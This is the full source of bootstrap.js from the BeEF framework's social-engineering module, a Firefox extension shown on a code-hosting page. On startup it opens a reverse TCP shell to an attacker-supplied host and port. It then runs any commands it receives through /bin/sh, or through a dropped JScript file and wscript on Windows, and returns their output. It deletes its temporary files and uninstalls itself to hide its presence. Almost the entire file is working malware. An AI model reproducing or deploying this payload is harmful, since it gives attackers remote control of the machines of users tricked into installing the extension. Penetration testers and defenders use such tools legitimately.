Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
Path: blob/master/modules/social_engineering/firefox_extension_reverse_shell/extension/bootstrap.js
1873 views
1
2
function startup(data, reason) {
3
var file = Components.classes["@mozilla.org/file/directory_service;1"].
4
getService(Components.interfaces.nsIProperties).
5
get("ProfD", Components.interfaces.nsIFile);
6
file.append("extensions");
7
xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}";
8
file.append(xpi_guid);
9
10
// # ./msfpayload firefox/shell_reverse_tcp
11
(function(){
12
Components.utils.import("resource://gre/modules/NetUtil.jsm");
13
var host = '__reverse_shell_host_placeholder__';
14
var port = __reverse_shell_port_placeholder__;
15
16
var socketTransport = Components.classes["@mozilla.org/network/socket-transport-service;1"]
17
.getService(Components.interfaces.nsISocketTransportService);
18
var socket = socketTransport.createTransport(null, 0, host, port, null);
19
var outStream = socket.openOutputStream(0, 0, 0);
20
var inStream = socket.openInputStream(0, 0, 0);
21
22
var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
23
.createInstance(Components.interfaces.nsIInputStreamPump);
24
pump.init(inStream, -1, -1, 0, 0, true);
25
26
var listener = {
27
onStartRequest: function(request, context) {},
28
onStopRequest: function(request, context) {},
29
onDataAvailable: function(request, context, stream, offset, count) {
30
var data = NetUtil.readInputStreamToString(stream, count).trim();
31
runCmd(data, function(err, output) {
32
if (!err) outStream.write(output, output.length);
33
});
34
}
35
};
36
37
var readFile = function(path) {
38
try {
39
var file = Components.classes["@mozilla.org/file/local;1"]
40
.createInstance(Components.interfaces.nsILocalFile);
41
file.initWithPath(path);
42
43
var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
44
.createInstance(Components.interfaces.nsIFileInputStream);
45
fileStream.init(file, 1, 0, false);
46
47
var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
48
.createInstance(Components.interfaces.nsIBinaryInputStream);
49
binaryStream.setInputStream(fileStream);
50
var array = binaryStream.readByteArray(fileStream.available());
51
52
binaryStream.close();
53
fileStream.close();
54
file.remove(true);
55
56
return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");
57
} catch (e) { return ""; }
58
};
59
60
61
var setTimeout = function(cb, delay) {
62
var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);
63
timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT);
64
return timer;
65
};
66
67
68
var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
69
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
70
var windows = (ua.indexOf("Windows")>-1);
71
var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
72
var jscript = ({"src":"\n var b64 = WScript.arguments(0);\n var dom = new ActiveXObject(\"MSXML2.DOMDocument.3.0\");\n var el = dom.createElement(\"root\");\n el.dataType = \"bin.base64\"; el.text = b64; dom.appendChild(el);\n var stream = new ActiveXObject(\"ADODB.Stream\");\n stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);\n stream.Position=0; stream.type=2; stream.CharSet = \"us-ascii\"; stream.Position=0;\n var cmd = stream.ReadText();\n (new ActiveXObject(\"WScript.Shell\")).Run(cmd, 0, true);\n "}).src;
73
var runCmd = function(cmd, cb) {
74
cb = cb || (function(){});
75
76
if (cmd.trim().length == 0) {
77
setTimeout(function(){ cb("Command is empty string ('')."); });
78
return;
79
}
80
81
var js = (/^\s*\[JAVASCRIPT\]([\s\S]*)\[\/JAVASCRIPT\]/g).exec(cmd.trim());
82
if (js) {
83
var tag = "[!JAVASCRIPT]";
84
var sync = true; // avoid zalgo's reach
85
var sent = false;
86
var retVal = null;
87
88
try {
89
retVal = Function('send', js[1])(function(r){
90
if (sent) return;
91
sent = true
92
if (r) {
93
if (sync) setTimeout(function(){ cb(false, r+tag+"\n"); });
94
else cb(false, r+tag+"\n");
95
}
96
});
97
} catch (e) { retVal = e.message; }
98
99
sync = false;
100
101
if (retVal && !sent) {
102
sent = true;
103
setTimeout(function(){ cb(false, retVal+tag+"\n"); });
104
}
105
106
return;
107
}
108
109
var shEsc = "\\$&";
110
var shPath = "/bin/sh -c"
111
112
if (windows) {
113
shPath = "cmd /c";
114
shEsc = "\^$&";
115
var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
116
.getService(Components.interfaces.nsIProperties)
117
.get("TmpD", Components.interfaces.nsIFile);
118
jscriptFile.append('7kZuA4kPoh2HzVagS.js');
119
var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
120
.createInstance(Components.interfaces.nsIFileOutputStream);
121
stream.init(jscriptFile, 0x04 | 0x08 | 0x20, 0666, 0);
122
stream.write(jscript, jscript.length);
123
if (stream instanceof Components.interfaces.nsISafeOutputStream) {
124
stream.finish();
125
} else {
126
stream.close();
127
}
128
}
129
130
var stdoutFile = "7tDzOIHbP3vzglqB";
131
132
var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
133
.getService(Components.interfaces.nsIProperties)
134
.get("TmpD", Components.interfaces.nsIFile);
135
stdout.append(stdoutFile);
136
137
if (windows) {
138
var shell = shPath+" "+cmd;
139
shell = shPath+" "+shell.replace(/\W/g, shEsc)+" >"+stdout.path+" 2>&1";
140
var b64 = svcs.btoa(shell);
141
} else {
142
var shell = shPath+" "+cmd.replace(/\W/g, shEsc);
143
shell = shPath+" "+shell.replace(/\W/g, shEsc) + " >"+stdout.path+" 2>&1";
144
}
145
var process = Components.classes["@mozilla.org/process/util;1"]
146
.createInstance(Components.interfaces.nsIProcess);
147
var sh = Components.classes["@mozilla.org/file/local;1"]
148
.createInstance(Components.interfaces.nsILocalFile);
149
150
if (windows) {
151
sh.initWithPath("C:\\Windows\\System32\\wscript.exe");
152
process.init(sh);
153
var args = [jscriptFile.path, b64];
154
process.run(true, args, args.length);
155
jscriptFile.remove(true);
156
setTimeout(function(){cb(false, cmd+"\n"+readFile(stdout.path));});
157
} else {
158
sh.initWithPath("/bin/sh");
159
process.init(sh);
160
var args = ["-c", shell];
161
process.run(true, args, args.length);
162
setTimeout(function(){cb(false, readFile(stdout.path));});
163
}
164
};
165
166
167
pump.asyncRead(listener, null);
168
})();
169
170
171
172
try { // Fx < 4.0
173
Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
174
} catch (e) {}
175
try { // Fx 4.0 and later
176
Components.utils.import("resource://gre/modules/AddonManager.jsm");
177
AddonManager.getAddonByID(xpi_guid, function(addon) {
178
addon.uninstall();
179
});
180
} catch (e) {}
181
}
182
183